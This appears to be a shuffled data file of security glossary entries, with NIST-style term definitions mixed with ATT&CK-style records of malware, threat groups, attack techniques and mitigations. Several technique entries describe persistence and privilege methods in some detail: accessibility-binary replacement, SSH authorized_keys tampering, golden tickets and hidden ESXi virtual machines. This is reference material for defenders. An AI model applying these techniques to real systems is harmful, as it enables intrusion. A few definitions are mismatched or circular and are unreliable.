Definition: Public and private keys are two very large numbers that (through advanced mathematics) have a unique relationship, whereby information encrypted with one number (key) can only be decrypted with the other number (key) and vice versa. In order to leverage this characteristic for security operations, once two numbers are mathematically selected (generated), one is kept secret (private key) and the other is shared (public key). The holder of the private key can then authenticate themselves to another party who has the public key. 
Alternatively, a public key may be used by one party to send a confidential message to the holder of the corresponding private key. With SSH, the identity key is a private key and authorized keys are public keys.

Term: Randomness Source
Definition: See Randomness Source.

Term: digital transaction
Definition: A discrete digital event between a user and a system that supports a business or programmatic purpose.

Name: Anchor
Type: malware
Description: Anchor is one of a family of backdoor malware that has been used in conjunction with TrickBot on selected high profile targets since at least 2018.

Term: firewall
Definition: Gateway that limits access between networks in accordance with local security policy.

Term: Predictability
Definition: Per NISTIR8062: Enabling reliable assumptions by individuals, owners, and operators about PII and its processing by an information system.

Term: Secure Hash Algorithm
Definition: The Secure Hash Algorithm defined in Federal Information Processing Standard 180-1.

Name: HOMEFRY
Type: malware
Description: HOMEFRY is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other Leviathan backdoors.

Term: IP
Definition: Useful artistic, technical, and/or industrial information, knowledge or ideas that convey ownership and control of tangible or virtual usage and/or representation.

Term: Cover-Coding
Definition: A technique to reduce the risks of eavesdropping by obscuring the information that is transmitted. The EPCglobal Class- 1 Generation-2 and ISO/IEC 18000-6C standards use cover-coding to obscure certain transmissions from readers to tags. A more detailed description of how cover-coding is used in these two standards can be found in Section 5.3.2.1 on cover-coding.

Term: International Mobile Equipment Identity (IMEI)
Definition: A unique identification number programmed into GSM and UMTS mobile devices.

Name: Dragonfly
Type: intrusion-set
Description: Dragonfly is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16. Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.

Term: destroy
Definition: In this Recommendation, to destroy is an action applied to a key or a piece of secret data. After a key or a piece of secret data is destroyed, no information about its value can be recovered.

Term: constraints
Definition: Limitation on the system, its design, its implementation, or the process used to develop or modify a system.

Term: min-entropy
Definition: A measure of the difficulty that an Attacker has to guess the most commonly chosen password used in a system. In this document, entropy is stated in bits. When a password has n-bits of min-entropy then an Attacker requires as many trials to find a user with that password as is needed to guess an n-bit random quantity. The Attacker is assumed to know the most commonly used password(s). See Appendix A.

Term: Hostname
Definition: Hostnames are most commonly defined and used in the context of DNS. The hostname of a system typically refers to the fully qualified DNS domain name of that system.

Term: Server
Definition: A computer or device on a network that manages network resources. Examples include file servers (to store files), print servers (to manage one or more printers), network servers (to manage network traffic), and database servers (to process database queries).

Term: trust
Definition: A belief that an entity meets certain expectations and therefore, can be relied upon.

Term: Integrator
Definition: A value-added engineering organization that focuses on industrial control and information systems, manufacturing execution systems, and plant automation, that has application knowledge and technical expertise, and provides an integrated solution to an engineering problem. This solution includes final project engineering, documentation, procurement of hardware, development of custom software, installation, testing, and commissioning.

Term: hash output
Definition: the fixed size result of hashing a message.

Term: Challenge-Response Protocol
Definition: An authentication protocol where the verifier sends the claimant a challenge (usually a random value or nonce) that the claimant combines with a secret (such as by hashing the challenge and a shared secret together, or by applying a private key operation to the challenge) to generate a response that is sent to the verifier. The verifier can independently verify the response generated by the claimant (such as by re-computing the hash of the challenge and the shared secret and comparing to the response, or performing a public key operation on the response) and establish that the claimant possesses and controls the secret.

Term: module
Definition: See Cryptographic module

Name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Type: attack-pattern
Description: Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).

Term: authenticated protected channel
Definition: An encrypted communication channel that uses approved cryptography where the connection initiator (client) has authenticated the recipient (server).

Name: Accessibility Features
Type: attack-pattern
Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. 

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. 

Other accessibility features exist that may also be leveraged in a similar fashion: 

* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

Term: eXtendable-Output Function (XOF)
Definition: <p>A function on bit strings in which the output can be extended to any desired length. Approved XOFs (e.g., those specified in FIPS 202) are designed to satisfy the following properties as long as the specified output length is sufficiently long to prevent trivial attacks</p><p>1. (One-way) It is computationally infeasible to find any input that maps to any new pre-specified output.</p><p>2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Name: VIRTUALPIE
Type: malware
Description: VIRTUALPIE is a lightweight backdoor written in Python that spawns an IPv6 listener on a VMware ESXi server and features command line execution, file transfer, and reverse shell capabilities. VIRTUALPIE has been in use since at least 2022 including by UNC3886 who installed it via malicious vSphere Installation Bundles (VIBs).

Name: Bidirectional Communication
Type: attack-pattern
Description: Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. 

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Term: PIM
Definition: data types such as contacts, calendar entries, tasks, notes, memos and email that may be synchronized from PC to device and vice-versa.

Term: ERM
Definition: An effective agency-wide approach to addressing the full spectrum of the organization’s significant risks by understanding the combined impact of risks as an interrelated portfolio, rather than addressing risks only within silos.

Term: Latin America and Caribbean Network Information Centre
Definition: The Internet Address Registry for Latin America and the Caribbean, responsible for assigning and managing Internet number resources for their region.

Term: privacy control assessment
Definition: See Security Control Assessment or Privacy Control Assessment.

Term: computer network exploitation (CNE)
Definition: Enabling operations and intelligence collection capabilities conducted through the use of computer networks to gather data from target or adversary information systems or networks. 
Note: Within the Department of Defense (DoD), term was approved for deletion from JP 1-02 (DoD Dictionary). Original source of term was JP 1-02 (DoD Dictionary). The military no longer uses this term to describe these operations, but it is still used outside of military operations.

Name: Suckfly
Type: intrusion-set
Description: Suckfly is a China-based threat group that has been active since at least 2014.

Term: octet
Definition: A string of eight bits.

Term: Desired State
Definition: See Desired State Specification.

Term: IT System
Definition: A discrete set of resources that are organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.

Term: <em>Sample</em>
Definition: An observation of the raw data output by a noise source. Common examples of output values obtained by sampling are single bits, single bytes, etc. (The term “sample” is often extended to denote a sequence of such observations; this Recommendation will refrain from that practice.)

Term: issuer
Definition: The organization that is issuing the PIV Card to an applicant. Typically, this is an organization for which the applicant is working.

Term: Cybersecurity Risk
Definition: An effect of uncertainty on or within information and technology. Cybersecurity risks relate to the loss of confidentiality, integrity, or availability of information, data, or information (or control) systems and reflect the potential adverse impacts to organizational operations (i.e., mission, functions, image, or reputation) and assets, individuals, other organizations, and the Nation. (Definition based on ISO Guide 73 [6] and NIST SP 800-60 Vol. 1 Rev. 1 [7])

Term: ISO
Definition: Maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions. 
[Note: The terms “continuous” and “ongoing” in this context mean that security controls and organizational risks are assessed and analyzed at a frequency sufficient to support risk-based security decisions to adequately protect organization information.]

Term: message digest
Definition: A hash that uniquely identifies data. Changing a single bit in the data stream used to generate the message digest will yield a completely different message digest.

Term: Web Server Administrator
Definition: The Web server equivalent of a system administrator. Web server administrators are system architects responsible for the overall design, implementation, and maintenance of Web servers. They may or may not be responsible for Web content, which is traditionally the responsibility of the Webmaster.

Term: SIA
Definition: The analysis conducted by an organizational official to determine the extent to which a change to an information system has affected the security state of that system.

Term: information technology product
Definition: A discrete identifiable information technology asset that represents a building block of a system and may include hardware, software, and firmware.

Name: Aria-body
Type: malware
Description: Aria-body is a custom backdoor that has been used by Naikon since approximately 2017.

Term: SWID Tag
Definition: A SWID tag is an ISO 19770-2 compliant XML file describing a software product. It is typically digitally signed by the software manufacturer to verify its validity. Ideally, for purposes of software asset management, the SWID tag will contain the digests (digital fingerprints) of each software file installed or placed on the device with the product.

Name: Data Obfuscation
Type: attack-pattern
Description: Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

Term: Capability, Credentials and Authentication Management
Definition: See Capability, Credentials and Authentication Management.

Name: Run Virtual Instance
Type: attack-pattern
Description: Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.

Adversaries may utilize native support for virtualization (ex: Hyper-V), deploy lightweight emulators (ex: QEMU), or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.

Threat actors may also leverage temporary virtualized environments such as the Windows Sandbox, which supports the use of `.wsb` configuration files for defining execution parameters. For example, the `<MappedFolder>` property supports the creation of a shared folder, while the `<LogonCommand>` property allows the specification of a payload.

In VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., RC Scripts) will cause the VM to persistently restart. Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.

Term: assurance of integrity
Definition: The property that protected data has not been modified or deleted in an unauthorized and undetected manner.

Term: Key Bundle
Definition: The three cryptographic keys (Key1, Key2, Key3) that are used with a TDEA mode.

Term: public key certificate
Definition: A set of data that uniquely identifies an entity, contains the entity's public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity. Additional information in the certificate could specify how the key is used and its validity period. (Certificates in this practice guide are based on IETF RFC 5280.)

Term: systems security officer (SSO)
Definition: See information systems security officer (ISSO).

Term: information security continuous monitoring (ISCM)
Definition: Use of automated procedures to ensure security controls are not circumvented or the use of these tools to track actions taken by subjects suspected of misusing the information system.

Term: attended
Definition: Under continuous positive control of personnel authorized for access or use.

Term: Govern-P (Function)
Definition: Develop and implement the organizational governance structure to enable an ongoing understanding of the organization’s risk management priorities that are informed by privacy risk.

Term: BAD
Definition: A mechanism providing a multifaceted approach to detecting cybersecurity attacks.

Term: TA
Definition: A public or symmetric key that is trusted because it is directly built into hardware or software, or securely provisioned via out-of-band means, rather than because it is vouched for by another trusted entity (e.g. in a public key certificate). A trust anchor may have name or policy constraints limiting its scope.

Term: Secure Digital eXtended Capacity (SDXC)
Definition: Supports cards up to 2 TB, compared to a limit of 32 GB for SDHC cards in the SD 2.0 specification.

Name: PittyTiger
Type: intrusion-set
Description: PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.

Term: Log Management Infrastructure
Definition: The hardware, software, networks, and media used to generate, transmit, store, analyze, and dispose of log data.

Term: information type
Definition: A specific category of information (e.g., privacy, medical, proprietary, financial, investigative, contractor-sensitive, security management) defined by an organization or in some instances, by a specific law, Executive Order, directive, policy, or regulation.

Term: Cyber Threat Intelligence
Definition: Cyber threat information that has been aggregated, transformed, analyzed, interpreted, or enriched to provide the necessary context for decision-making processes.

Name: Whitefly
Type: intrusion-set
Description: Whitefly is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.

Term: Concatenation
Definition: For strings X and Y, X || Y is the concatenation of X and Y. For example, 11001 || 010 = 11001010.

Term: XML Signature
Definition: A mechanism for ensuring the origin and integrity of XML documents. XML Signatures provide integrity, message authentication, or signer authentication services for data of any type, whether located within the XML that includes the signature or elsewhere.

Term: authorize processing
Definition: The process that takes place after authentication is complete to determine which resources/services are available to a WiMAX device.

Term: TEMPEST
Definition: A name referring to the investigation, study, and control of unintentional compromising emanations from telecommunications and automated information systems equipment.

Term: computer network defense (CND)
Definition: Actions taken to defend against unauthorized activity within computer networks. CND includes monitoring, detection, analysis (such as trend and pattern analysis), and response and restoration activities. 
Note: Within DoD, term was approved for deletion from JP 1-02 (DoD Dictionary) by issuance of JP 3-13, "Information Operations". This term has been replaced by the use of “cyberspace defense" used in JP 3-12, "Cyberspace Operations." Original source of term was JP 1-02 (DoD Dictionary).

Name: CopyKittens
Type: intrusion-set
Description: CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.

Term: Syntactic matching
Definition: uses internal structures present in digital objects. For example, the structure of a TCP network packet is defined by an international standard and matching tools can make use of this structure during network packet analysis to match the source, destination or content of the packet. Syntax-sensitive similarity measurements are specific to a particular class of objects that share an encoding but require no interpretation of the content to produce meaningful results.

Term: Sybil Attack
Definition: A cybersecurity attack wherein an attacker creates multiple accounts and pretends to be many persons at once.

Term: infeasible
Definition: Infeasible acknowledges the possibility of data recovery with future, more advanced technology. It simply means that, for a given level of effort and using current "state of the art" techniques, recovery cannot be done.

Term: diffusion models
Definition: A class of latent variable generative models consisting of three major components: a forward process, a reverse process, and a sampling procedure. The goal of the diffusion model is to learn a diffusion process that generates the probability distribution of a given dataset. It is widely used in computer vision on a variety of tasks, including image denoising, inpainting, super-resolution, and image generation.

Term: tailored control baseline
Definition: A set of controls that result from the application of tailoring guidance to a control baseline. See tailoring.

Term: cryptographic module
Definition: A set of hardware, software, and/or firmware that implements approved security functions (including cryptographic algorithms and key generation).

Term: Network Layer Security
Definition: Protecting network communications at the layer of the TCP/IP model that is responsible for routing packets across networks.

Term: Operating system virtualization
Definition: A virtual implementation of the OS interface that can be used to run applications written for the same OS.

Term: AUC
Definition: A measure of the ability of a classifier to distinguish between classes in machine learning. A higher AUC means that a model performs better when dis­tinguishing between the two classes. AUC measures the entire two-dimensional area under the receiver operating characteristic (ROC) curve.

Term: Disk image
Definition: A virtual representation of a real disk drive.

Term: subscriber
Definition: A party who has received a credential or authenticator from a CSP.

Name: PACEMAKER
Type: malware
Description: PACEMAKER is a credential stealer that was used by APT5 as early as 2020 including activity against US Defense Industrial Base (DIB) companies.

Term: Archive facility
Definition: Long-term, physically separate storage.

Term: <em>Mlen</em>
Definition: The bit length of the message.

Term: access level
Definition: A category within a given security classification limiting entry or system connectivity to only authorized persons.

Name: sqlmap
Type: tool
Description: sqlmap is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws.

Term: nonce
Definition: A time-varying value that has at most a negligible chance of repeating – for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: respond (CSF function)
Definition: Develop and implement the appropriate activities to take action regarding a detected cybersecurity event.

Term: special character
Definition: A non-alphanumeric character that may be defined by one or more CPE specifications to have a special meaning when it appears unquoted in a WFN. Special characters typically trigger a processor to perform a given function. The rules for escaping CPE special characters are defined in the CPE Naming specification [CPE23-N:5.3.2].

Term: label limit
Definition: A capability with which an attacker does not control the labels of training sam­ples in supervised learning.

Term: cryptographic key
Definition: The parameter of the block cipher that determines the selection of the forward cipher function from the family of permutations.

Term: Key-wrapping key
Definition: A symmetric key that is used to provide both confidentiality and integrity protection for other keys. Also see Key-encrypting key.

Term: key establishment
Definition: A procedure conducted by two or more participants, after which the resultant keying material is shared by all participants.

Term: Test Guide
Definition: A document that outlines the basic steps involved in conducting a test and includes a list of the participants, a list of individuals and groups who might be affected by the test, and procedures for early termination of the test.

Term: Off-Card
Definition: Refers to data that is not stored within the PIV Card or to a computation that is not performed by the Integrated Circuit Chip (ICC) of the PIV Card.

Term: <em>A</em>
Definition: The associated data string.

Name: System Service Discovery
Type: attack-pattern
Description: Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.

Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Term: nonce-misuse
Definition: A setting in which a nonce is used more than once for the encryption algorithm under a given key.

Term: ICT Supply Chain
Definition: Linked set of resources and processes between acquirers, integrators, and suppliers that begins with the design of ICT products and services and extends through development, sourcing, manufacturing, handling, and delivery of ICT products and services to the acquirer.

Name: SSH Authorized Keys
Type: attack-pattern
Description: Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code> (or, on ESXi, `/etc/ssh/keys-<username>/authorized_keys`). Users may edit the system’s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account. Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH. It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. 

SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` Network Device CLI command.

Name: Network Intrusion Prevention
Type: course-of-action
Description: Use intrusion detection signatures to block traffic at network boundaries.

Term: graded label
Definition: Indicates the degree to which a product has satisfied a specific standard, sometimes based on attaining increasing levels of performance against specified criteria. Tiers or grades are often represented by colors (e.g., red-yellow-green), numbers of icons (e.g., stars or security shields), or other appropriate metaphors (e.g., precious metals: gold-silver-bronze).

Term: processing
Definition: Per NISTIR8062: Operation or set of operations performed upon PII that can include, but is not limited to, the collection, retention, logging, generation, transformation, use, disclosure, transfer, and disposal of PII.

Term: Archive
Definition: 2. A location or media used for long-term storage.

Term: Chief Information Officers (CIO) Council
Definition: The CIO Council is the principal interagency forum for improving agency practices related to the design, acquisition, development, modernization, use, sharing, and performance of Federal information resources.

Name: Metador
Type: intrusion-set
Description: Metador is a suspected cyber espionage group that was first reported in September 2022. Metador has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group Metador based on the "I am meta" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.

Term: Biometric Capture Device
Definition: Device that collects a signal from a biometric characteristic and converts it to a captured biometric sample.

Name: GeminiDuke
Type: malware
Description: GeminiDuke is malware that was used by APT29 from 2009 to 2012.

Term: key agreement
Definition: A key-establishment procedure where keying material is generated from information contributed by two or more participants so that no party can predetermine the value of the keying material independently of any other party’s contribution.

Term: GPS
Definition: A system for determining position by comparing radio signals from several satellites.

Term: Dashboard
Definition: See Agency Dashboard and Federal Dashboard.

Term: criticality level
Definition: A measure of the degree to which an organization depends on the information or information system for the success of a mission or of a business function.

Name: jRAT
Type: malware
Description: jRAT is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of jRAT have been distributed via a software-as-a-service platform, similar to an online subscription model.

Term: HA
Definition: A failover feature to ensure availability during device or component interruptions.

Term: {<i>X</i>}
Definition: Indicates that the inclusion of X is optional.

Term: cryptographic module
Definition: The set of hardware, software, and/or firmware that implements approved security functions (including cryptographic algorithms and key generation) and is contained within the cryptographic boundary.

Term: Archive facility
Definition: 1. To place information into long-term storage.

Term: <em>(r, s)</em>
Definition: Digital signature for DSA or ECDSA.

Term: Target Platform
Definition: The target operating system or application on which a vendor product will be evaluated using a platform-specific validation lab test suite. These platform-specific test suites consist of specialized SCAP content used to perform the test procedures defined in this document.

Name: Golden Ticket
Type: attack-pattern
Description: Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket. Golden tickets enable adversaries to generate authentication material for any account in Active Directory. 

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets. The KRBTGT password hash may be obtained using OS Credential Dumping and privileged access to a domain controller.

Term: MAC tag
Definition: Data obtained from the output of a MAC algorithm that can be used by an entity to verify the integrity and the origination of the information used as input.

Term: Federation Assurance Level (FAL)
Definition: A category describing the assertion protocol used by the federation to communicate authentication and attribute information (if applicable) to a relying party.

Name: Encrypt Sensitive Information
Type: course-of-action
Description: Protect sensitive information at rest, in transit, and during processing by using strong encryption algorithms. Encryption ensures the confidentiality and integrity of data, preventing unauthorized access or tampering. This mitigation can be implemented through the following measures:

Encrypt Data at Rest:

- Use Case: Use full-disk encryption or file-level encryption to secure sensitive data stored on devices.
- Implementation: Implement BitLocker for Windows systems or FileVault for macOS devices to encrypt hard drives.

Encrypt Data in Transit:

- Use Case: Use secure communication protocols (e.g., TLS, HTTPS) to encrypt sensitive data as it travels over networks.
- Implementation: Enable HTTPS for all web applications and configure mail servers to enforce STARTTLS for email encryption.

Encrypt Backups:

- Use Case: Ensure that backup data is encrypted both during storage and transfer to prevent unauthorized access.
- Implementation: Encrypt cloud backups using AES-256 before uploading them to Amazon S3 or Google Cloud.

Encrypt Application Secrets:

- Use Case: Store sensitive credentials, API keys, and configuration files in encrypted vaults.
- Implementation: Use HashiCorp Vault or AWS Secrets Manager to manage and encrypt secrets.

Database Encryption:

- Use Case: Enable Transparent Data Encryption (TDE) or column-level encryption in database management systems.
- Implementation: Use MySQL’s built-in encryption features to encrypt sensitive database fields such as social security numbers.

Term: AT
Definition: Systems engineering activities intended to prevent physical manipulation or delay exploitation of critical program information in U.S. defense systems in domestic and export configurations to impede countermeasure development, unintended technology transfer, or alteration of a system due to reverse engineering.

Term: AO
Definition: Senior (federal) official or executive with the authority to formally assume responsibility for operating an information system at an acceptable level of risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation.

Name: Search Engines
Type: attack-pattern
Description: Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Valid Accounts or Phishing).

Term: CD
Definition: A class of media from which data are read by optical means.

Term: TTA
Definition: An entity that is trusted to provide accurate time information.

Term: Random bit
Definition: A bit for which an attacker has exactly a 50% probability of success of guessing the value of the bit as either a zero or one. It is also called an unbiased bit.

Term: Static key
Definition: A key that is intended for use for a relatively long period of time and is typically intended for use in many instances of a cryptographic key-establishment scheme. Contrast with an Ephemeral key.

Term: most significant bit(s)
Definition: The left-most bit(s) of a bit string.

Term: encryption
Definition: The process of changing plaintext into ciphertext using a cryptographic algorithm for the purpose of security or privacy.

Term: audit trail
Definition: A chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security-relevant transaction from inception to final result.

Term: replay resistance
Definition: The property of an authentication process to resist replay attacks, typically by the use of an authenticator output that is only valid for a specific authentication.

Term: Trusted Party
Definition: A trusted party is a party that is trusted by an entity to faithfully perform certain services for that entity. An entity could be a trusted party for itself.

Term: advanced persistent threat
Definition: An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives by using multiple attack vectors, including cyber, physical, and deception. These objectives typically include establishing and extending footholds within the IT infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat pursues its objectives repeatedly over an extended period; adapts to defenders’ efforts to resist it; and is determined to maintain the level of interaction needed to execute its objectives.

Term: fine‐tuning
Definition: The process of adapting a pre-trained model to perform specific tasks or spe­cialize in a particular domain. This phase follows the initial pre-training phase and involves further training the model on task-specific data. This is often a supervised learning task.

Term: red team exercise
Definition: An exercise, reflecting real-world conditions that is conducted as a simulated adversarial attempt to compromise organizational missions or business processes and to provide a comprehensive assessment of the security capabilities of an organization and its systems.

Term: information security risk
Definition: The risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or information systems. See risk.

Term: IT
Definition: (A) with respect to an executive agency means any equipment or interconnected system or subsystem of equipment, used in the automatic acquisition, storage, analysis, evaluation, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency, if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency that requires the use— (i) of that equipment; or (ii) of that equipment to a significant extent in the performance of a service or the furnishing of a product; (B) includes computers, ancillary equipment (including imaging peripherals, input, output, and storage devices necessary for security and surveillance), peripheral equipment designed to be controlled by the central processing unit of a computer, software, firmware and similar procedures, services (including support services), and related resources; but (C) does not include any equipment acquired by a federal contractor incidental to a federal contract.

Term: Key Management Policy
Definition: A high-level statement of organizational key management policies that identifies a high-level structure, responsibilities, governing Standards and Recommendations, organizational dependencies and other relationships, and security policies.

Term: senior agency information security officer (SAISO)
Definition: Official responsible for carrying out the chief information officer (CIO) responsibilities under the Federal Information Security Management Act (FISMA) and serving as the CIO’s primary liaison to the agency’s authorizing officials, information system owners, and information systems security officers. 
Note: Also known as senior information security officer (SISO) or chief information security officer (CISO).

Term: Work Role
Definition: A way of describing a grouping of work for which someone is responsible or accountable.

Term: FCKMS Security Policy
Definition: A security policy specific to an FCKMS.

Term: architecture
Definition: A highly structured specification of an acceptable approach within a framework for solving a specific problem. An architecture contains descriptions of all the components of a selected, acceptable solution while allowing certain details of specific components to be variable to satisfy related constraints (e.g., costs, local environment, user acceptability).

Term: register
Definition: A set of records (paper, electronic, or a combination) maintained by a Registration Authority containing assigned names and the associated information.

Term: federation
Definition: A collection of realms (domains) that have established trust among themselves. The level of trust may vary, but typically includes authentication and may include authorization.

Term: SCAP source data stream
Definition: An SCAP data stream that holds input (source) content.

Term: Hardware-Enabled Security
Definition: Security with its basis in the hardware platform.

Term: Concatenation
Definition: Concatenation of two bit strings X and Y.

Term: Memorandum of Understanding or Agreement
Definition: Memorandum of Agreement (as used in the context of this CP, between an Agency and the FPKIPA allowing interoperation between the FBCA and Agency Principal CA)

Term: resilient otherwise
Definition: See securely resilient.

Term: key
Definition: A bit string used as a secret parameter by a cryptographic algorithm. In this Recommendation, a cryptographic key is either a random bit string of a length specified by the cryptographic algorithm or a pseudorandom bit string of the required length that is computationally indistinguishable from one selected uniformly at random from the set of all bit strings of that length.

Term: Master key
Definition: A key used with a key-derivation function or method to derive additional keys. Also called a master key.

Name: PUNCHBUGGY
Type: malware
